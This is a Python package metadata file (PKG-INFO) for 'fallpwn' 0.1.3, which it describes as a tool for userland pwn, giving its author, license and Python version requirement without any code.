Metadata-Version: 2.1
Name: fallpwn
Version: 0.1.3
Summary: A useful tool for userland pwn.
Home-page: UNKNOWN
Author: ltfall
Author-email: wanqiultfall@gmail.com
License: UNKNOWN
Platform: UNKNOWN
Classifier: Programming Language :: Python :: 3
Classifier: License :: OSI Approved :: GNU General Public License (GPL)
Classifier: Operating System :: OS Independent
Requires-Python: >=3.6
License-File: LICENSE
